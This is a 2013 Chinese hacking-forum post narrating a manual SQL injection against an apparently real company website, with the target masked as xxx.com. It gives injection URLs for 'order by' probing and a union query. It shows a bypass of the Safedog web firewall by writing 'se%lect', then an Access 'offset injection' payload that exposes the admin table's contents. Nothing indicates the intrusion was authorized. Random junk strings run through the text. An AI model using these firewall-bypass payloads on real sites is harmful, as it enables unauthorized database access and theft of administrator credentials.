中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
+ b  h% l/ D: @
; B) L' S6 U1 T# O0 t6 P; B: y# K  J
顺手加个admin% r7 ?- `3 c% R; J/ W
$ d' ?( a" F: e* i, W
: C0 ?* F% c# X6 `) ^1 V
默认后台。. k! y. N% R- n( S/ z: O& N
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​) p2 F/ W: `$ O, H

. n- l  Z" R1 m) M6 N. t3 `& a8 a, s  K
& P+ S/ K% q# T& x" D8 T& A* N" F
5 [( j6 k8 j- w  U: A  \  M# w2 N所以就不用御剑扫了,待会直接封IP。
1 V: J$ t/ |( n& u4 T   M+ E# e5 B  u, H+ z2 f9 U
用order by语句判断是否存在注入。% X, U2 D2 S# t: ^- U$ u
http://www.xxx.com /product_show.asp?id=997 order by 18 L8 i# f# }: m% _& C0 R8 k1 `
http://www.xxx.com /product_show.asp?id=997 order by 100
" i2 U$ L2 v2 O. Q现在存在注入,经测试后发现是9个字段。
) z7 J, T& s& _9 D; ^/ {, R# }5 y 5 T3 N' ?* @. q5 }4 p
接下来进行联合查询,猜是否存在admin表。* Z- f1 [# G, \5 ?  o" S
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
% E* Z* o' ~( |2 V# ~# J1 U- R( J& G2 l% a1 O; T

8 C5 K# v; E7 I& [! j0 H
+ s! `5 o8 W; G5 r在select中间加个%,se%lect绕过安全狗。
/ ?; J$ S. P$ W% h: i  e8 N5 i9 Q* e- V3 L
( @' [( Z1 s! s/ A  v+ i
发现存在admin表,然后开始手工猜常用的字段。& @2 l8 N' ]; ]# |: y6 j
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
( E6 y4 y8 c" [# H, c4 A7 I9 x
8 X! Z/ w* Y8 \3 J" B, R突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 R8 q* Q5 J% ~4 m
$ s. e! D3 y. K! E: e. {
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
! T; G3 c0 g; k/ [http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin2 [( k3 |% a7 b# Y, f" s+ K
好了,敏感内容出显了。​
' j# _( M) ~9 f, r5 {" D; m# G
1 B+ q1 a7 @3 c* V, w# K, N* o: |7 h, E# Q& W# H, ]

( S- m) x$ T0 z8 `




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2